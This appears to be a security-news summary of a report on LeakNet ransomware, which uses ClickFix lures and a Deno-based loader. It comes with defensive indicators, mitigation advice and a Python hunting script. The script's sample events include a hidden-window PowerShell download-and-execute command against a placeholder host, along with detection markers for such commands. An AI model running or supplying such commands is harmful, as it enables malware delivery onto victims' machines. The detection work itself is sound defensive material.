Malware & Ransomware · HIGH

LeakNet Ransomware - Stealthy Attacks Using ClickFix Technique

BleepingComputer

In short: a newer ransomware gang is tricking employees into running commands that let it into corporate networks, then running its loader on a legitimate developer tool so the intrusion is harder to spot.

Quick Summary

The LeakNet ransomware gang is using ClickFix social engineering for initial access and a loader built on the Deno runtime to stay under the radar. The tactic targets corporate environments, and because both steps lean on ordinary user actions and legitimate tooling, it raises the risk of undetected data theft.

What Happened

The LeakNet ransomware gang has recently ramped up its operations by adopting ClickFix. In a ClickFix attack the victim is shown a fake error, verification or "fix" prompt and is talked into running a command themselves, typically by pasting it into the Windows Run dialog or a terminal, which gives the attackers initial access to the corporate environment without exploiting any software flaw. Once inside, they deploy a malware loader that runs on Deno, the open-source JavaScript and TypeScript runtime. Because the malicious logic executes inside a legitimate, widely used developer binary rather than a custom executable, it is less likely to be flagged by signature-based controls.

LeakNet, which has been active since late 2024, has typically claimed around three victims a month. With ClickFix and the Deno-based loader in its toolkit, that pace may rise. Relying on a legitimate tool like Deno helps the group get past security measures and makes the intrusion harder for defenders to spot.

Who's Being Targeted

LeakNet primarily targets corporate environments, where the potential for data theft and disruption is high. The ClickFix technique is particularly effective where employees are accustomed to following instructions from seemingly legitimate prompts, such as a support page or a CAPTCHA-style check, and will paste a command without questioning it. In organizations where JavaScript and TypeScript tooling is common, a Deno process is one more developer utility among many and is less likely to stand out.

The gang's tooling, which includes Visual Basic Script (VBS) and PowerShell scripts alongside the Deno loader, is chosen to blend in with routine administrative scripting and developer activity. This stealthy approach lets them stage and execute their payloads without raising alarms, increasing the likelihood of a successful breach.

Signs of Infection

Organizations should watch for several signs that may indicate LeakNet activity. Key indicators include:

  • Deno running outside of development environments: a deno.exe that appears on a non-developer workstation, runs from a user-writable location such as a temp or profile directory, or is launched by a script host (for example wscript.exe or powershell.exe) rather than a developer tool warrants investigation.
  • Suspicious execution patterns: unexpected PowerShell or VBS execution, in particular scripts named like Romeo*.ps1 and Juliet*.vbs, and shells spawned directly from explorer.exe with an encoded or download-and-execute command line, which is what a command pasted into the Run dialog looks like.
  • Unexpected outbound traffic: connections to Amazon S3 bucket endpoints from processes that have no business talking to S3 (a script host, a Deno process, anything other than a browser or a known backup or sync agent), or to other unusual destinations, should be investigated promptly.
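The three indicators above can be turned into a hunt over exported endpoint telemetry. The script below is an added example, not code from the BleepingComputer article or from LeakNet's tooling: it runs over a handful of constructed process-creation and network-connection events (Sysmon-style fields reduced to a small dict), flags deno.exe outside an assumed allowlist of install directories or under a script-host parent, matches the Romeo*.ps1 / Juliet*.vbs naming, looks for a ClickFix-style shell launched from explorer.exe, and flags S3 traffic from processes not on an assumed allowlist. The allowlists, the command-line markers and the sample events are all assumptions to be tuned for a real environment.

```python
import fnmatch
import ntpath
import re

# Assumed allowlist (hypothetical, tune per organisation): directories from which a
# developer-installed deno.exe is expected to run. Anything else is suspect.
DENO_EXPECTED_DIRS = (r"c:\program files\deno", r"c:\users\*\.deno\bin")
# Script hosts and shells that have no business launching a developer runtime.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Script naming reported for this campaign.
SCRIPT_NAME_PATTERNS = ("romeo*.ps1", "juliet*.vbs")
# Assumed allowlist of processes for which S3 traffic is normal (extend with backup agents etc.).
S3_ALLOWED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "onedrive.exe"}
# Heuristic markers of a command pasted from a ClickFix lure (hidden window, encoded
# or download-and-execute PowerShell). Only applied to shells whose parent is explorer.exe.
CLICKFIX_MARKERS = ("-enc", "-w hidden", "-windowstyle hidden", "iex", "irm ",
                    "invoke-expression", "downloadstring")
SCRIPT_PATH_RE = re.compile(r'[^\s"\']+\.(?:ps1|vbs)\b', re.IGNORECASE)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host via ntpath)."""
    return ntpath.basename(path).lower()


def is_s3_host(host: str) -> bool:
    """True for bucket endpoints such as x.s3.amazonaws.com or s3-eu-west-1.amazonaws.com."""
    labels = host.lower().rstrip(".").split(".")
    if labels[-2:] != ["amazonaws", "com"]:
        return False
    return any(lbl == "s3" or lbl.startswith("s3-") for lbl in labels[:-2])


def check_process(ev: dict) -> list[str]:
    """Return a list of findings for one process-creation event."""
    findings = []
    image = ev["image"].lower()
    parent = _base(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    if _base(image) == "deno.exe":
        if not any(fnmatch.fnmatchcase(ntpath.dirname(image), p) for p in DENO_EXPECTED_DIRS):
            findings.append("deno.exe running outside expected install directories")
        if parent in SCRIPT_HOSTS:
            findings.append(f"deno.exe spawned by script host {parent}")
    # Any .ps1/.vbs path on the command line is checked against the campaign naming.
    for script in SCRIPT_PATH_RE.findall(cmd):
        if any(fnmatch.fnmatchcase(_base(script), p) for p in SCRIPT_NAME_PATTERNS):
            findings.append(f"campaign-style script name {ntpath.basename(script)}")
    # A shell started by explorer.exe is what a Win+R paste looks like in process telemetry.
    lowered = cmd.lower()
    if parent == "explorer.exe" and _base(image) in SCRIPT_HOSTS \
            and any(m in lowered for m in CLICKFIX_MARKERS):
        findings.append("shell launched from explorer.exe with ClickFix-style command line")
    return findings


def check_network(ev: dict) -> list[str]:
    """Return a finding if a non-allowlisted process talks to an S3 endpoint."""
    if is_s3_host(ev.get("dest_host", "")) and _base(ev["image"]) not in S3_ALLOWED_IMAGES:
        return [f"{_base(ev['image'])} connecting to S3 endpoint {ev['dest_host']}"]
    return []


def hunt(events: list[dict]) -> list[tuple[int, str]]:
    """Run every event through the matching checker; return (event id, finding) pairs."""
    hits = []
    for ev in events:
        checker = check_process if ev["type"] == "process" else check_network
        hits.extend((ev["id"], f) for f in checker(ev))
    return hits


# Constructed sample telemetry (not real logs): one benign developer run, one loader chain,
# one campaign-named VBS, one ClickFix-style paste, one benign and one suspicious S3 flow.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Users\alice\.deno\bin\deno.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "command_line": "deno run --allow-net main.ts"},
    {"id": 2, "type": "process", "image": r"C:\Users\bob\AppData\Local\Temp\deno.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"deno run -A C:\Users\bob\AppData\Roaming\loader.ts"},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'wscript.exe "C:\Users\bob\AppData\Local\Temp\JulietX7.vbs"'},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (irm https://example.invalid/fix)"'},
    {"id": 5, "type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "static-assets.s3.amazonaws.com"},
    {"id": 6, "type": "network", "image": r"C:\Users\bob\AppData\Local\Temp\deno.exe",
     "dest_host": "exfil-drop.s3.eu-west-1.amazonaws.com"},
]

if __name__ == "__main__":
    for event_id, finding in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {finding}")
```

Run as-is it reports events 2 (twice), 3, 4 and 6 and stays silent on the developer's legitimate Deno run and the browser's S3 traffic. The parent-process and path checks matter more than the file name: a renamed deno binary still shows up as a runtime launched by wscript.exe from a temp directory, while the Romeo/Juliet naming is trivial for the operators to change.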

By understanding these signs, security teams can better prepare and respond to potential threats from LeakNet.

How to Protect Yourself

To defend against LeakNet and similar ransomware threats, organizations should implement several proactive measures:

  • Enhance user training: teach employees that no legitimate website, CAPTCHA or support page will ask them to paste a command into the Run dialog, a terminal or PowerShell, and that such a request is the ClickFix scam itself.
  • Reduce the attack surface for pasted commands: where staff have no need for it, restrict the Run dialog and interactive PowerShell through policy, and constrain which scripts may run (for example with PowerShell's constrained language mode or application control).
  • Monitor for unusual activities: make sure process creation is logged with full command lines and parent process (Sysmon Event ID 1 or Windows 4688 with command-line auditing), then hunt for unexpected Deno executions, campaign-style script names and S3 traffic from processes that should not generate it.
  • Strengthen endpoint security: use endpoint detection and response (EDR) tooling that can identify and respond to anomalous process chains in real time, and keep tested offline backups so an encryption event does not become a ransom decision.

By taking these steps, organizations can significantly reduce their risk of ransomware attacks and better protect their sensitive data from groups like LeakNet.

🔒 Pro insight: The adoption of Deno in ransomware operations signifies a shift towards leveraging legitimate tools for malicious purposes, complicating detection efforts.

Original article from BleepingComputer · Bill Toulas

Related Pings

HIGH · Malware & Ransomware

Malware - Konni Uses Phishing to Deploy EndRAT via KakaoTalk

North Korean hackers are using phishing emails to deploy EndRAT malware. Victims' KakaoTalk accounts are compromised to spread the attack further. This poses a significant risk to sensitive information and trust among contacts. Stay vigilant against suspicious emails and messages.

The Hacker News

HIGH · Malware & Ransomware

Payload Ransomware - New Threat Uses Babuk-Style Encryption

A new ransomware called Payload is wreaking havoc across sectors. It targets mid-to-large organizations, stealing and encrypting critical data. With advanced techniques, the risk of data loss is significant. Organizations must take immediate action to protect themselves.

Cyber Security News

HIGH · Malware & Ransomware

Malware - ClickFix Attacks Evolve with ChatGPT Lures

ClickFix attacks are evolving, now targeting macOS users with sophisticated infostealers like MacSync. These tactics exploit user trust, bypassing security measures. Stay alert to protect your data!

Security Affairs

HIGH · Malware & Ransomware

Malware - Malicious npm Packages Deliver PylangGhost RAT

A new remote access trojan, PylangGhost, has infiltrated npm packages, posing a serious risk to developers. This malware, linked to North Korean hackers, could compromise entire organizations. Immediate action is essential to mitigate the threat.

Cyber Security News

HIGH · Malware & Ransomware

Malware - New CondiBot Variant and Monaco Cryptominer Threaten Network Devices

New malware strains, CondiBot and Monaco, are targeting network devices, posing significant risks to enterprises. Their multi-architecture designs allow for widespread exploitation. Organizations must act swiftly to protect their infrastructure.

Cyber Security News

HIGH · Malware & Ransomware

Keylogger - Understanding This Old-School Malware Threat

Keyloggers are still a serious threat in cybercrime today. They capture sensitive data like passwords and financial information. Understanding how they work can help you protect yourself.

CSO Online